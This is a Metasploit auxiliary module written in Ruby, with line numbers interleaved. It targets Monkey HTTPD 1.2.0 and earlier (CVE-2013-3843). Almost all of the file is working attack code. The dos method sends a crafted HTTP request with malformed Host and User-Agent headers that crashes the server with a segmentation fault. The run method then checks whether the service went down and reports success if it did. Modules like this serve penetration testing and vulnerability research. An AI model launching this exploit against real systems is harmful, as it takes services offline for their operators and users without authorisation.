1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Tcp
8
  include Msf::Auxiliary::Dos
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'Monkey HTTPD Header Parsing Denial of Service (DoS)',
15
        'Description' => %q{
16
          This module causes improper header parsing that leads to a segmentation fault
17
          due to a specially crafted HTTP request. Affects version <= 1.2.0.
18
        },
19
        'Author' => [
20
          'Doug Prostko <dougtko[at]gmail.com>'
21
        ],
22
        'License' => MSF_LICENSE,
23
        'References' => [
24
          ['CVE', '2013-3843'],
25
          ['OSVDB', '93853'],
26
          ['BID', '60333']
27
        ],
28
        'DisclosureDate' => '2013-05-30',
29
        'Notes' => {
30
          'Stability' => [CRASH_SERVICE_DOWN],
31
          'SideEffects' => [],
32
          'Reliability' => []
33
        }
34
      )
35
    )
36

37
    register_options(
38
      [
39
        Opt::RPORT(2001)
40
      ]
41
    )
42
  end
43

44
  def dos
45
    req = "GET / HTTP/1.1\r\n"
46
    req << "Host:\r\n\r\nlocalhost\r\n"
47
    req << "User-Agent:\r\n\r\n"
48

49
    connect
50
    sock.put(req)
51
    disconnect
52
  end
53

54
  def is_alive?
55
    begin
56
      connect
57
    rescue Rex::ConnectionRefused
58
      return false
59
    ensure
60
      disconnect
61
    end
62

63
    true
64
  end
65

66
  def run
67
    print_status("#{rhost}:#{rport} - Sending DoS packet...")
68
    dos
69

70
    print_status("#{rhost}:#{rport} - Checking server status...")
71
    select(nil, nil, nil, 1)
72

73
    if is_alive?
74
      print_error("#{rhost}:#{rport} - Server is still alive")
75
    else
76
      print_good("#{rhost}:#{rport} - Connection Refused: Success!")
77
    end
78
  end
79
end
80

81